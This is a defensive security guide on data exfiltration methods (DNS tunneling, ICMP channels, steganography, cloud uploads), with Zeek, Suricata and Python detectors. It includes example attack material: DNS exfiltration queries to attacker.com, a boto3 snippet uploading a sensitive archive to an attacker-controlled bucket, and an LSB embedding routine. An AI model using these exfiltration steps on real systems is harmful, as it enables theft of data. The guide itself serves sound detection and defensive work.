Data Exfiltration Techniques Every Defender Should Know

After a threat actor establishes a foothold inside a network, their ultimate goal is usually data: credentials, intellectual property, customer records, strategic documents. Getting that data out without triggering alarms is the challenge of data exfiltration, and attackers have developed a wide range of techniques designed to blend into normal network traffic or bypass data loss prevention (DLP) controls entirely.

Understanding these techniques is essential for defenders building detection capabilities. This guide covers the most common exfiltration methods with enough technical detail to inform both detection engineering and defensive architecture.

DNS Tunneling

DNS is ideal for data exfiltration because it is almost never blocked at the perimeter. Even networks with aggressive outbound firewall rules typically allow DNS traffic through, and many organizations either run no DNS monitoring at all or rely solely on blocklists for threat detection.

How It Works

An attacker encodes data in DNS query hostnames. Because DNS queries for a domain like attacker.com will pass through internal resolvers and ultimately reach the attacker’s authoritative nameserver, data can be exfiltrated as subdomains:

c3VwZXJzZWNyZXRkYXRhY2h1bmsx.exfil.attacker.com
c3VwZXJzZWNyZXRkYXRhY2h1bmsyMg.exfil.attacker.com

Each query carries a Base64-encoded chunk of the stolen data. The attacker’s authoritative DNS server receives and reassembles it. Tools that implement this include Iodine, DNScat2, and dnsexfil.
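
For an analyst reconstructing what left the network, the encoding described above can be reversed from resolver logs. The following is a minimal Python sketch, assuming unpadded standard Base64 in the labels to the left of the tunnel domain and queries already in capture order. The helper name decode_exfil_queries and the default suffix are illustrative, and real tools often use Base32 or hex instead, because DNS names are case-insensitive.

```python
import base64

def decode_exfil_queries(queries, suffix=".exfil.attacker.com"):
    """Recover payload bytes from logged query names (illustrative helper)."""
    chunks = []
    for name in queries:
        name = name.rstrip(".")
        if not name.endswith(suffix):
            continue  # not part of the suspected tunnel
        # Everything left of the tunnel domain is encoded data
        encoded = name[: -len(suffix)].replace(".", "")
        # Restore the padding that was stripped to keep '=' out of hostnames
        encoded += "=" * (-len(encoded) % 4)
        chunks.append(base64.b64decode(encoded))
    return b"".join(chunks)

logged = [
    "c3VwZXJzZWNyZXRkYXRhY2h1bmsx.exfil.attacker.com",
    "c3VwZXJzZWNyZXRkYXRhY2h1bmsyMg.exfil.attacker.com",
]
print(decode_exfil_queries(logged))
```

Run against the two example queries, this recovers the strings supersecretdatachunk1 and supersecretdatachunk22, joined in order.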

Detection with Zeek

Zeek (formerly Bro) can detect DNS tunneling through behavioral analysis rather than signature matching:

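module DNS;

export {
    # Declare the notice type raised below
    redef enum Notice::Type += { Tunneling_Candidate };
}

event dns_request(c: connection, msg: dns_msg, query: string, qtype: count, qclass: count) {
    # Long query names suggest encoded data; tune the threshold per network
    if (|query| > 50) {
        NOTICE([$note=DNS::Tunneling_Candidate,
                $conn=c,
                $msg=fmt("Long DNS query: %s", query)]);
    }
}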

Key behavioral indicators:

High query volume to a single domain in a short time window
Unusually long subdomain labels (normal hostnames rarely exceed 30 characters)
High entropy subdomains — Base64-encoded data has higher entropy than human-readable hostnames
No corresponding HTTP/HTTPS traffic to the queried domain
Abnormal NXDOMAIN ratios: many tunneling tools generate queries for nonexistent subdomains, so an unusually high share of NXDOMAIN responses for one domain stands out
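
Two of these indicators, label length and entropy, are easy to compute per query. The sketch below is a starting point rather than a tuned detector: the function names are illustrative, the 30-character limit comes from the list above, and the 3.5 bits-per-character entropy threshold is an assumption to calibrate against local traffic.

```python
import math
from collections import Counter

def shannon_entropy(text):
    """Shannon entropy of a string, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def is_tunneling_candidate(query, max_label_len=30, min_entropy=3.5):
    """Flag a query whose longest label is both long and high-entropy."""
    labels = query.rstrip(".").split(".")
    longest = max(labels, key=len)
    return len(longest) > max_label_len and shannon_entropy(longest) >= min_entropy

print(is_tunneling_candidate("www.example.com"))
print(is_tunneling_candidate("abcdefghijklmnopqrstuvwxyz012345.exfil.attacker.com"))
```

Requiring both conditions is a design choice to cut false positives from long but readable names such as CDN hostnames. The volume and NXDOMAIN indicators need state across many queries and are better handled in the log pipeline.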

Suricata Signature

alert dns any any -> any any (msg:"Possible DNS Tunneling - Long Encoded Label"; \
  dns.query; content:"."; pcre:"/^[a-zA-Z0-9+\/]{40,}\./"; \
  threshold: type both, track by_src, count 10, seconds 60; \
  sid:9000001; rev:1;)

ICMP Covert Channels

ICMP (the protocol underlying ping) allows arbitrary data in the payload field of echo request and reply packets. Because ICMP is a core networking protocol, it is rarely inspected and often allowed through firewalls.

How It Works

Tools like Ptunnel, icmptunnel, and Hans establish full bidirectional tunnels over ICMP echo traffic. An attacker pings their command-and-control server with data-stuffed ICMP payloads. The C2 server responds with commands. To a casual observer, this looks like routine connectivity testing.

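Default ping payloads are small: 32 bytes on Windows (a repeating run of alphabet letters) and 56 bytes on most Linux systems. Tunneling tools carry far larger payloads, typically sized to fit the path MTU (up to 1,472 bytes on standard Ethernet). The theoretical IPv4 maximum is 65,507 bytes (65,535 minus the 20-byte IP header and the 8-byte ICMP header), but payloads that large require fragmentation.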

Detection

Flag ICMP echo packets with payloads exceeding 64 bytes
Alert on high-frequency ICMP traffic to a single external IP
Inspect ICMP payloads for high-entropy data rather than the standard repeating patterns

Zeek script approach:

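module ICMP;
export {
    redef enum Notice::Type += { Oversized_Payload };  # notice type raised below
}
# Recent Zeek releases pass an icmp_info record (older Bro versions used icmp_conn)
event icmp_echo_request(c: connection, info: icmp_info, id: count, seq: count, payload: string) {
    if (|payload| > 64) {
        NOTICE([$note=ICMP::Oversized_Payload, $conn=c,
                $msg=fmt("ICMP payload %d bytes", |payload|)]);
    }
}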
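
The size and entropy checks can also be applied offline to payloads extracted from a packet capture. The following Python sketch assumes payloads are already available as bytes. The 64-byte cutoff comes from the list above, while the 6.0 bits-per-byte entropy threshold and the 256-byte minimum sample size are assumptions, and the function names are illustrative.

```python
import math
from collections import Counter

MAX_TYPICAL_PAYLOAD = 64   # bytes; cutoff for default ping payloads
HIGH_ENTROPY_BITS = 6.0    # bits per byte; assumed threshold, tune locally
MIN_ENTROPY_SAMPLE = 256   # bytes; entropy is unreliable on tiny payloads

def byte_entropy(data):
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

def icmp_payload_flags(payload):
    """Return the list of reasons an echo payload looks unusual."""
    flags = []
    if len(payload) > MAX_TYPICAL_PAYLOAD:
        flags.append("oversized")
    if len(payload) >= MIN_ENTROPY_SAMPLE and byte_entropy(payload) >= HIGH_ENTROPY_BITS:
        flags.append("high_entropy")
    return flags

windows_ping = b"abcdefghijklmnopqrstuvwabcdefghi"  # 32-byte Windows-style payload
print(icmp_payload_flags(windows_ping))
print(icmp_payload_flags(b"A" * 1000))
```

An oversized but low-entropy payload (the second call) may simply be someone testing MTU with a large ping. Oversized and high-entropy together is the combination worth escalating.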

Steganography

Steganography hides data inside seemingly innocent files (images, audio, video, or documents), making exfiltration hard to detect for DLP tools that scan for known file types or keyword patterns.

Common Techniques

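LSB (Least Significant Bit) image steganography: The least significant bit of each color channel in each pixel stores one bit of hidden data. Modifying an image this way creates no perceptible visual change, and capacity is roughly one-eighth of the raw pixel data: about 778 KB (777,600 bytes) in a 1920×1080 RGB image, and several MB in a high-resolution photo.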
Document metadata embedding: Sensitive data hidden in Word document properties, PDF metadata, or EXIF fields of images
Audio steganography: Data encoded in inaudible frequency ranges or in audio file waveforms using tools like DeepSound or Steghide
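
To make the LSB technique concrete, the following Python sketch embeds and recovers bytes in a flat buffer of 8-bit channel values, one hidden bit per channel value. It is a teaching aid under simplifying assumptions: it works on raw bytes rather than a real image format, the function names are illustrative, and actual tools add headers, encryption, and pseudo-random bit placement.

```python
def lsb_capacity_bytes(width, height, channels=3):
    """Hidden bytes that fit at one bit per channel value."""
    return (width * height * channels) // 8

def embed_lsb(pixels, secret):
    """Write the bits of `secret` into the low bit of successive channel values."""
    bits = [(byte >> (7 - i)) & 1 for byte in secret for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover data too small for secret")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit  # clear the low bit, then set it
    return bytes(out)

def extract_lsb(pixels, n_bytes):
    """Read back `n_bytes` from the low bits, most significant bit first."""
    out = bytearray()
    for i in range(n_bytes):
        value = 0
        for channel in pixels[i * 8:(i + 1) * 8]:
            value = (value << 1) | (channel & 1)
        out.append(value)
    return bytes(out)

cover = bytes([128] * 64)            # stand-in for raw pixel data
stego = embed_lsb(cover, b"hi")
print(extract_lsb(stego, 2))
print(lsb_capacity_bytes(1920, 1080))
```

Every channel value changes by at most 1, which is why the result is visually identical to the cover image and why detection has to rely on statistics rather than inspection.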

Real-World Use

Nation-state actors including APT32 (OceanLotus) have used steganography operationally. A 2024 Kaspersky report documented a campaign where stolen credentials were encoded in PNG files uploaded to legitimate image hosting services. DLP tools saw a PNG upload to Imgur — not a red flag. The attacker’s server downloaded the same image and extracted the data.

Detection

Statistical analysis tools can identify common embedding schemes with reasonable accuracy: StegExpose targets LSB embedding in lossless images, while stegdetect targets JPEG-based schemes
Monitor for unusually large uploads of image files from endpoints that do not typically generate such traffic
Hash-compare uploaded images against their originals if they originated internally

Cloud Storage Abuse

Uploading stolen data to legitimate cloud services — Google Drive, OneDrive, Dropbox, AWS S3 — is one of the most effective DLP evasion techniques because the traffic is:

Encrypted (HTTPS)
Destined for trusted domains that are on most allowlists
Hard to distinguish from legitimate sync traffic by volume alone, unless the transfer is unusually large or fast

The Technique

The attacker installs a legitimate cloud sync client, authenticates to an attacker-controlled account, places sensitive files in the sync folder, and allows the client software to upload them. Alternatively, they use cloud provider APIs directly:

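import boto3
# Placeholder credentials for an attacker-controlled AWS account
s3 = boto3.client('s3', aws_access_key_id='ATTACKER_KEY',
                  aws_secret_access_key='ATTACKER_SECRET')
# Upload the staged archive to the attacker-owned bucket over HTTPS
s3.upload_file('sensitive_data.zip', 'attacker-bucket', 'data.zip')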

Detection

DLP with cloud integration: Inspect content going to cloud storage using CASB (Cloud Access Security Broker) solutions (Microsoft Defender for Cloud Apps, Netskope, Zscaler)
Allowlist corporate cloud tenants: Use tenant restrictions to ensure traffic to OneDrive goes only to your organization’s tenant, not arbitrary Microsoft accounts
Monitor for cloud sync client installations on endpoints where they are not expected
Alert on volume spikes — exfiltrating gigabytes of data to Dropbox in minutes differs from normal sync behavior
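
The volume-spike check can be approximated with a simple per-host baseline. This sketch assumes daily upload totals per endpoint are already available from proxy or CASB logs. The function name and the three-standard-deviation threshold are illustrative choices, not a recommendation from any particular product.

```python
import statistics

def is_upload_spike(history_bytes, today_bytes, k=3.0):
    """True when today's upload volume exceeds mean + k * stdev of the history."""
    if len(history_bytes) < 2:
        return False  # not enough data to form a baseline
    mean = statistics.mean(history_bytes)
    stdev = statistics.stdev(history_bytes)
    return today_bytes > mean + k * stdev

# Daily upload totals (in MB) for one endpoint to one cloud service
history = [100, 110, 90, 105, 95]
print(is_upload_spike(history, 108))
print(is_upload_spike(history, 10_000))
```

A per-host baseline matters here: a design workstation that syncs gigabytes daily and a finance laptop that syncs a few megabytes need very different thresholds.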

Additional Evasion Techniques

Slow and Low Exfiltration

Patient attackers deliberately limit bandwidth, exfiltrating 100 MB over weeks rather than minutes to stay below volumetric anomaly detection thresholds.

Detection: Long-term baselining. Alert on persistent connections to uncommon external hosts, even at low bandwidth.
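
One way to approach this is to aggregate outbound bytes per source and destination pair over a long window and look for pairs that are active on many days, never large on any single day, but substantial in total. The sketch below assumes flow records reduced to (day, source, destination, bytes out) tuples. The function name and all three thresholds are hypothetical and need tuning.

```python
from collections import defaultdict

def find_slow_exfil(records, min_days=14, min_total_bytes=50_000_000,
                    max_daily_bytes=10_000_000):
    """Return (pair, active_days, total_bytes) for persistent low-volume flows."""
    daily = defaultdict(lambda: defaultdict(int))
    for day, src, dst, bytes_out in records:
        daily[(src, dst)][day] += bytes_out

    hits = []
    for pair, per_day in daily.items():
        total = sum(per_day.values())
        if (len(per_day) >= min_days                        # active on many days
                and total >= min_total_bytes                # adds up over time
                and max(per_day.values()) <= max_daily_bytes):  # never spikes
            hits.append((pair, len(per_day), total))
    return hits

# 5 MB per day for 20 days to one host, plus a single large one-off transfer
records = [(day, "10.0.0.5", "203.0.113.9", 5_000_000) for day in range(20)]
records.append((3, "10.0.0.7", "198.51.100.2", 200_000_000))
print(find_slow_exfil(records))
```

In practice the result would be filtered against known-good destinations such as update servers and backup providers, which show the same persistent low-volume shape.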

Protocol Smuggling

Hiding data inside legitimate protocol fields: HTTP User-Agent headers, HTTP/2 HEADERS frames, TLS SNI fields, or unused bits in TCP options.

Encrypted C2 Channels

Modern C2 frameworks (Cobalt Strike, Sliver, Brute Ratel) use HTTPS for C2 communication, with traffic profiles that mimic legitimate services (for example, Microsoft or CDN traffic). Detection typically relies on TLS fingerprinting (JA3/JA4 hashes) and behavioral analysis of connection timing and data volumes.
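
The connection-timing side of that analysis often starts with beacon detection: implants tend to check in at regular intervals, so the gaps between connections vary far less than human-driven traffic. The sketch below scores one host pair using the coefficient of variation of those gaps. The function name and thresholds are illustrative, and frameworks that add jitter to their sleep interval will need a looser cutoff or a different statistic.

```python
import statistics

def looks_like_beacon(timestamps, min_events=6, max_cv=0.1):
    """True when connection start times are spaced at near-constant intervals."""
    if len(timestamps) < min_events:
        return False
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    mean_gap = statistics.mean(gaps)
    if mean_gap <= 0:
        return False
    # Coefficient of variation: spread of the gaps relative to their mean
    cv = statistics.pstdev(gaps) / mean_gap
    return cv <= max_cv

regular = [i * 60 for i in range(10)]            # one connection every 60 seconds
irregular = [0, 5, 300, 310, 2000, 2100, 9000]   # bursty, human-like browsing
print(looks_like_beacon(regular))
print(looks_like_beacon(irregular))
```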

Building a Detection Strategy

Effective exfiltration detection requires multiple layers:

Layer	Tooling	What It Catches
Network visibility	Zeek, Suricata, Corelight	DNS tunneling, ICMP abuse, protocol anomalies
Endpoint telemetry	EDR (CrowdStrike, SentinelOne)	File access patterns, process-to-network associations
CASB	Netskope, Defender for Cloud Apps	Cloud storage abuse, shadow IT uploads
DLP	Symantec DLP, Microsoft Purview	Keyword/pattern matching in content
UEBA	Splunk UBA, Exabeam	Behavioral baselines, anomalous data access

No single tool catches all methods. A defender who understands how these techniques work — and where each detection approach has blind spots — is far better positioned to build layered visibility than one who relies on a single product’s marketing claims.